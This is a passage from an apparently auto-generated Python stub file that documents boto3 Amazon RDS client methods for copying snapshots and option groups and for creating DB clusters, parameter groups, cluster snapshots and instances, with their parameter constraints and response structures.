The identifier for the copied DB parameter group.
Constraints:
Cannot be null, empty, or blank
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-db-parameter-group
:type TargetDBParameterGroupDescription: string
:param TargetDBParameterGroupDescription: [REQUIRED]
A description for the copied DB parameter group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBParameterGroup': {
'DBParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBParameterGroupArn': 'string'
}
}
"""
pass
def copy_db_snapshot(SourceDBSnapshotIdentifier=None, TargetDBSnapshotIdentifier=None, KmsKeyId=None, Tags=None, CopyTags=None, PreSignedUrl=None, SourceRegion=None):
"""
Copies the specified DB snapshot. The source DB snapshot must be in the "available" state.
To copy a DB snapshot from a shared manual DB snapshot, SourceDBSnapshotIdentifier must be the Amazon Resource Name (ARN) of the shared DB snapshot.
You can copy an encrypted DB snapshot from another AWS region. In that case, the region where you call the CopyDBSnapshot action is the destination region for the encrypted DB snapshot to be copied to. To copy an encrypted DB snapshot from another region, you must provide the following values:
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
For more information on copying encrypted snapshots from one region to another, see Copying a DB Snapshot in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example copies a DB snapshot.
Expected Output:
:example: response = client.copy_db_snapshot(
SourceDBSnapshotIdentifier='string',
TargetDBSnapshotIdentifier='string',
KmsKeyId='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
CopyTags=True|False,
SourceRegion='string'
)
:type SourceDBSnapshotIdentifier: string
:param SourceDBSnapshotIdentifier: [REQUIRED]
The identifier for the source DB snapshot.
If you are copying from a shared manual DB snapshot, this must be the ARN of the shared DB snapshot.
You cannot copy an encrypted, shared DB snapshot from one AWS region to another.
Constraints:
Must specify a valid system snapshot in the 'available' state.
If the source snapshot is in the same region as the copy, specify a valid DB snapshot identifier.
If the source snapshot is in a different region than the copy, specify a valid DB snapshot ARN. For more information, go to Copying a DB Snapshot or DB Cluster Snapshot .
Example: rds:mydb-2012-04-02-00-01
Example: arn:aws:rds:us-west-2:123456789012:snapshot:mysql-instance1-snapshot-20130805
:type TargetDBSnapshotIdentifier: string
:param TargetDBSnapshotIdentifier: [REQUIRED]
The identifier for the copied snapshot.
Constraints:
Cannot be null, empty, or blank
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-db-snapshot
:type KmsKeyId: string
:param KmsKeyId: The AWS KMS key ID for an encrypted DB snapshot. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
If you copy an unencrypted DB snapshot and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target DB snapshot using the specified KMS encryption key.
If you copy an encrypted DB snapshot from your AWS account, you can specify a value for KmsKeyId to encrypt the copy with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the copy of the DB snapshot is encrypted with the same KMS key as the source DB snapshot.
If you copy an encrypted snapshot to a different AWS region, then you must specify a KMS key for the destination AWS region.
If you copy an encrypted DB snapshot that is shared from another AWS account, then you must specify a value for KmsKeyId .
To copy an encrypted DB snapshot to another region, you must set KmsKeyId to the KMS key ID used to encrypt the copy of the DB snapshot in the destination region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type CopyTags: boolean
:param CopyTags: True to copy all tags from the source DB snapshot to the target DB snapshot; otherwise false. The default is false.
:type PreSignedUrl: string
:param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CopyDBSnapshot API action in the AWS region that contains the source DB snapshot to copy. The PreSignedUrl parameter must be used when copying an encrypted DB snapshot from another AWS region.
The presigned URL must be a valid request for the CopyDBSnapshot API action that can be executed in the source region that contains the encrypted DB snapshot to be copied. The presigned URL request must contain the following parameter values:
DestinationRegion - The AWS Region that the encrypted DB snapshot will be copied to. This region is the same one where the CopyDBSnapshot action is called that contains this presigned URL. For example, if you copy an encrypted DB snapshot from the us-west-2 region to the us-east-1 region, then you will call the CopyDBSnapshot action in the us-east-1 region and provide a presigned URL that contains a call to the CopyDBSnapshot action in the us-west-2 region. For this example, the DestinationRegion in the presigned URL must be set to the us-east-1 region.
KmsKeyId - The KMS key identifier for the key to use to encrypt the copy of the DB snapshot in the destination region. This is the same identifier for both the CopyDBSnapshot action that is called in the destination region, and the action contained in the presigned URL.
SourceDBSnapshotIdentifier - The DB snapshot identifier for the encrypted snapshot to be copied. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you are copying an encrypted DB snapshot from the us-west-2 region, then your SourceDBSnapshotIdentifier looks like the following example: arn:aws:rds:us-west-2:123456789012:snapshot:mysql-instance1-snapshot-20161115 .
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
:type SourceRegion: string
:param SourceRegion: The ID of the region that contains the snapshot to be copied.
:rtype: dict
:return: {
'DBSnapshot': {
'DBSnapshotIdentifier': 'string',
'DBInstanceIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'AvailabilityZone': 'string',
'VpcId': 'string',
'InstanceCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'Iops': 123,
'OptionGroupName': 'string',
'PercentProgress': 123,
'SourceRegion': 'string',
'SourceDBSnapshotIdentifier': 'string',
'StorageType': 'string',
'TdeCredentialArn': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'DBSnapshotArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
TargetDBSnapshotIdentifier - The identifier for the new copy of the DB snapshot in the destination region.
SourceDBSnapshotIdentifier - The DB snapshot identifier for the encrypted snapshot to be copied. This identifier must be in the ARN format for the source region and is the same value as the SourceDBSnapshotIdentifier in the presigned URL.
"""
pass
def copy_option_group(SourceOptionGroupIdentifier=None, TargetOptionGroupIdentifier=None, TargetOptionGroupDescription=None, Tags=None):
"""
Copies the specified option group.
See also: AWS API Documentation
Examples
This example copies an option group.
Expected Output:
:example: response = client.copy_option_group(
SourceOptionGroupIdentifier='string',
TargetOptionGroupIdentifier='string',
TargetOptionGroupDescription='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type SourceOptionGroupIdentifier: string
:param SourceOptionGroupIdentifier: [REQUIRED]
The identifier or ARN for the source option group. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
Constraints:
Must specify a valid option group.
If the source option group is in the same region as the copy, specify a valid option group identifier, for example my-option-group , or a valid ARN.
If the source option group is in a different region than the copy, specify a valid option group ARN, for example arn:aws:rds:us-west-2:123456789012:og:special-options .
:type TargetOptionGroupIdentifier: string
:param TargetOptionGroupIdentifier: [REQUIRED]
The identifier for the copied option group.
Constraints:
Cannot be null, empty, or blank
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-option-group
:type TargetOptionGroupDescription: string
:param TargetOptionGroupDescription: [REQUIRED]
The description for the copied option group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'OptionGroup': {
'OptionGroupName': 'string',
'OptionGroupDescription': 'string',
'EngineName': 'string',
'MajorEngineVersion': 'string',
'Options': [
{
'OptionName': 'string',
'OptionDescription': 'string',
'Persistent': True|False,
'Permanent': True|False,
'Port': 123,
'OptionVersion': 'string',
'OptionSettings': [
{
'Name': 'string',
'Value': 'string',
'DefaultValue': 'string',
'Description': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'IsCollection': True|False
},
],
'DBSecurityGroupMemberships': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroupMemberships': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
]
},
],
'AllowsVpcAndNonVpcInstanceMemberships': True|False,
'VpcId': 'string',
'OptionGroupArn': 'string'
}
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def create_db_cluster(AvailabilityZones=None, BackupRetentionPeriod=None, CharacterSetName=None, DatabaseName=None, DBClusterIdentifier=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, DBSubnetGroupName=None, Engine=None, EngineVersion=None, Port=None, MasterUsername=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, ReplicationSourceIdentifier=None, Tags=None, StorageEncrypted=None, KmsKeyId=None, PreSignedUrl=None, EnableIAMDatabaseAuthentication=None, SourceRegion=None):
"""
Creates a new Amazon Aurora DB cluster.
You can use the ReplicationSourceIdentifier parameter to create the DB cluster as a Read Replica of another DB cluster or Amazon RDS MySQL DB instance. For cross-region replication where the DB cluster identified by ReplicationSourceIdentifier is encrypted, you must also specify the PreSignedUrl parameter.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example creates a DB cluster.
Expected Output:
:example: response = client.create_db_cluster(
AvailabilityZones=[
'string',
],
BackupRetentionPeriod=123,
CharacterSetName='string',
DatabaseName='string',
DBClusterIdentifier='string',
DBClusterParameterGroupName='string',
VpcSecurityGroupIds=[
'string',
],
DBSubnetGroupName='string',
Engine='string',
EngineVersion='string',
Port=123,
MasterUsername='string',
MasterUserPassword='string',
OptionGroupName='string',
PreferredBackupWindow='string',
PreferredMaintenanceWindow='string',
ReplicationSourceIdentifier='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageEncrypted=True|False,
KmsKeyId='string',
EnableIAMDatabaseAuthentication=True|False,
SourceRegion='string'
)
:type AvailabilityZones: list
:param AvailabilityZones: A list of EC2 Availability Zones that instances in the DB cluster can be created in. For information on regions and Availability Zones, see Regions and Availability Zones .
(string) --
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days for which automated backups are retained. You must specify a minimum value of 1.
Default: 1
Constraints:
Must be a value from 1 to 35
:type CharacterSetName: string
:param CharacterSetName: A value that indicates that the DB cluster should be associated with the specified CharacterSet.
:type DatabaseName: string
:param DatabaseName: The name for your database of up to 64 alpha-numeric characters. If you do not provide a name, Amazon RDS will not create a database in the DB cluster you are creating.
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The DB cluster identifier. This parameter is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster1
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: The name of the DB cluster parameter group to associate with this DB cluster. If this argument is omitted, default.aurora5.6 will be used.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of EC2 VPC security groups to associate with this DB cluster.
(string) --
:type DBSubnetGroupName: string
:param DBSubnetGroupName: A DB subnet group to associate with this DB cluster.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type Engine: string
:param Engine: [REQUIRED]
The name of the database engine to be used for this DB cluster.
Valid Values: aurora
:type EngineVersion: string
:param EngineVersion: The version number of the database engine to use.
Aurora
Example: 5.6.10a
:type Port: integer
:param Port: The port number on which the instances in the DB cluster accept connections.
Default: 3306
:type MasterUsername: string
:param MasterUsername: The name of the master user for the DB cluster.
Constraints:
Must be 1 to 16 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
:type MasterUserPassword: string
:param MasterUserPassword: The password for the master database user. This password can contain any printable ASCII character except '/', ''', or '@'.
Constraints: Must contain from 8 to 41 characters.
:type OptionGroupName: string
:param OptionGroupName: A value that indicates that the DB cluster should be associated with the specified option group.
Permanent options cannot be removed from an option group. The option group cannot be removed from a DB cluster once it is associated with a DB cluster.
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled using the BackupRetentionPeriod parameter.
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
Format: ddd:hh24:mi-ddd:hh24:mi
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type ReplicationSourceIdentifier: string
:param ReplicationSourceIdentifier: The Amazon Resource Name (ARN) of the source DB instance or DB cluster if this DB cluster is created as a Read Replica.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageEncrypted: boolean
:param StorageEncrypted: Specifies whether the DB cluster is encrypted.
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier for an encrypted DB cluster.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are creating a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
If the StorageEncrypted parameter is true, and you do not specify a value for the KmsKeyId parameter, then Amazon RDS will use your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS region.
If you create a Read Replica of an encrypted DB cluster in another region, you must set KmsKeyId to a KMS key ID that is valid in the destination region. This key is used to encrypt the Read Replica in that region.
:type PreSignedUrl: string
:param PreSignedUrl: A URL that contains a Signature Version 4 signed request for the CreateDBCluster action to be called in the source region where the DB cluster will be replicated from. You only need to specify PreSignedUrl when you are performing cross-region replication from an encrypted DB cluster.
The pre-signed URL must be a valid request for the CreateDBCluster API action that can be executed in the source region that contains the encrypted DB cluster to be copied.
The pre-signed URL request must contain the following parameter values:
KmsKeyId - The KMS key identifier for the key to use to encrypt the copy of the DB cluster in the destination region. This should refer to the same KMS key for both the CreateDBCluster action that is called in the destination region, and the action contained in the pre-signed URL.
DestinationRegion - The name of the region that Aurora Read Replica will be created in.
ReplicationSourceIdentifier - The DB cluster identifier for the encrypted DB cluster to be copied. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you are copying an encrypted DB cluster from the us-west-2 region, then your ReplicationSourceIdentifier would look like Example: arn:aws:rds:us-west-2:123456789012:cluster:aurora-cluster1 .
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
Default: false
:type SourceRegion: string
:param SourceRegion: The ID of the region that contains the source for the db cluster.
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def create_db_cluster_parameter_group(DBClusterParameterGroupName=None, DBParameterGroupFamily=None, Description=None, Tags=None):
"""
Creates a new DB cluster parameter group.
Parameters in a DB cluster parameter group apply to all of the instances in a DB cluster.
A DB cluster parameter group is initially created with the default parameters for the database engine used by instances in the DB cluster. To provide custom values for any of the parameters, you must modify the group after creating it using ModifyDBClusterParameterGroup . Once you've created a DB cluster parameter group, you need to associate it with your DB cluster using ModifyDBCluster . When you associate a new DB cluster parameter group with a running DB cluster, you need to reboot the DB instances in the DB cluster without failover for the new DB cluster parameter group and associated settings to take effect.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example creates a DB cluster parameter group.
Expected Output:
:example: response = client.create_db_cluster_parameter_group(
DBClusterParameterGroupName='string',
DBParameterGroupFamily='string',
Description='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: [REQUIRED]
The name of the DB cluster parameter group.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Note
This value is stored as a lowercase string.
:type DBParameterGroupFamily: string
:param DBParameterGroupFamily: [REQUIRED]
The DB cluster parameter group family name. A DB cluster parameter group can be associated with one and only one DB cluster parameter group family, and can be applied only to a DB cluster running a database engine and engine version compatible with that DB cluster parameter group family.
:type Description: string
:param Description: [REQUIRED]
The description for the DB cluster parameter group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBClusterParameterGroup': {
'DBClusterParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBClusterParameterGroupArn': 'string'
}
}
"""
pass
def create_db_cluster_snapshot(DBClusterSnapshotIdentifier=None, DBClusterIdentifier=None, Tags=None):
"""
Creates a snapshot of a DB cluster. For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example creates a DB cluster snapshot.
Expected Output:
:example: response = client.create_db_cluster_snapshot(
DBClusterSnapshotIdentifier='string',
DBClusterIdentifier='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBClusterSnapshotIdentifier: string
:param DBClusterSnapshotIdentifier: [REQUIRED]
The identifier of the DB cluster snapshot. This parameter is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster1-snapshot1
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The identifier of the DB cluster to create a snapshot for. This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster1
:type Tags: list
:param Tags: The tags to be assigned to the DB cluster snapshot.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBClusterSnapshot': {
'AvailabilityZones': [
'string',
],
'DBClusterSnapshotIdentifier': 'string',
'DBClusterIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'VpcId': 'string',
'ClusterCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'PercentProgress': 123,
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DBClusterSnapshotArn': 'string',
'SourceDBClusterSnapshotArn': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBClusterSnapshot
DeleteDBClusterSnapshot
"""
pass
def create_db_instance(DBName=None, DBInstanceIdentifier=None, AllocatedStorage=None, DBInstanceClass=None, Engine=None, MasterUsername=None, MasterUserPassword=None, DBSecurityGroups=None, VpcSecurityGroupIds=None, AvailabilityZone=None, DBSubnetGroupName=None, PreferredMaintenanceWindow=None, DBParameterGroupName=None, BackupRetentionPeriod=None, PreferredBackupWindow=None, Port=None, MultiAZ=None, EngineVersion=None, AutoMinorVersionUpgrade=None, LicenseModel=None, Iops=None, OptionGroupName=None, CharacterSetName=None, PubliclyAccessible=None, Tags=None, DBClusterIdentifier=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, StorageEncrypted=None, KmsKeyId=None, Domain=None, CopyTagsToSnapshot=None, MonitoringInterval=None, MonitoringRoleArn=None, DomainIAMRoleName=None, PromotionTier=None, Timezone=None, EnableIAMDatabaseAuthentication=None):
"""
Creates a new DB instance.
See also: AWS API Documentation
Examples
This example creates a DB instance.
Expected Output:
:example: response = client.create_db_instance(
DBName='string',
DBInstanceIdentifier='string',
AllocatedStorage=123,
DBInstanceClass='string',
Engine='string',
MasterUsername='string',
MasterUserPassword='string',
DBSecurityGroups=[
'string',
],
VpcSecurityGroupIds=[
'string',
],
AvailabilityZone='string',
DBSubnetGroupName='string',
PreferredMaintenanceWindow='string',
DBParameterGroupName='string',
BackupRetentionPeriod=123,
PreferredBackupWindow='string',
Port=123,
MultiAZ=True|False,
EngineVersion='string',
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
Iops=123,
OptionGroupName='string',
CharacterSetName='string',
PubliclyAccessible=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
DBClusterIdentifier='string',
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
StorageEncrypted=True|False,
KmsKeyId='string',
Domain='string',
CopyTagsToSnapshot=True|False,
MonitoringInterval=123,
MonitoringRoleArn='string',
DomainIAMRoleName='string',
PromotionTier=123,
Timezone='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBName: string
:param DBName: The meaning of this parameter differs according to the database engine you use.
Type: String
MySQL
The name of the database to create when the DB instance is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
MariaDB
The name of the database to create when the DB instance is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
PostgreSQL
The name of the database to create when the DB instance is created. If this parameter is not specified, the default 'postgres' database is created in the DB instance.
Constraints:
Must contain 1 to 63 alphanumeric characters
Must begin with a letter or an underscore. Subsequent characters can be letters, underscores, or digits (0-9).
Cannot be a word reserved by the specified database engine
Oracle
The Oracle System ID (SID) of the created DB instance. If you specify null , the default value ORCL is used. You can't specify the string NULL, or any other reserved word, for DBName .
Default: ORCL
Constraints:
Cannot be longer than 8 characters
SQL Server
Not applicable. Must be null.
Amazon Aurora
The name of the database to create when the primary instance of the DB cluster is created. If this parameter is not specified, no database is created in the DB instance.
Constraints:
Must contain 1 to 64 alphanumeric characters
Cannot be a word reserved by the specified database engine
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This parameter is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens (1 to 15 for SQL Server).
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: mydbinstance
:type AllocatedStorage: integer
:param AllocatedStorage: The amount of storage (in gigabytes) to be initially allocated for the database instance.
Type: Integer
Amazon Aurora
Not applicable. Aurora cluster volumes automatically grow as the amount of data in your database increases, though you are only charged for the space that you use in an Aurora cluster volume.
MySQL
Constraints: Must be an integer from 5 to 6144.
MariaDB
Constraints: Must be an integer from 5 to 6144.
PostgreSQL
Constraints: Must be an integer from 5 to 6144.
Oracle
Constraints: Must be an integer from 10 to 6144.
SQL Server
Constraints: Must be an integer from 200 to 4096 (Standard Edition and Enterprise Edition) or from 20 to 4096 (Express Edition and Web Edition)
:type DBInstanceClass: string
:param DBInstanceClass: [REQUIRED]
The compute and memory capacity of the DB instance. Note that not all instance classes are available in all regions for all DB engines.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.xlarge |db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
:type Engine: string
:param Engine: [REQUIRED]
The name of the database engine to be used for this instance.
Valid Values: mysql | mariadb | oracle-se1 | oracle-se2 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
Not every database engine is available for every AWS region.
:type MasterUsername: string
:param MasterUsername: The name for the master database user.
Amazon Aurora
Not applicable. You specify the name for the master database user when you create your DB cluster.
MariaDB
Constraints:
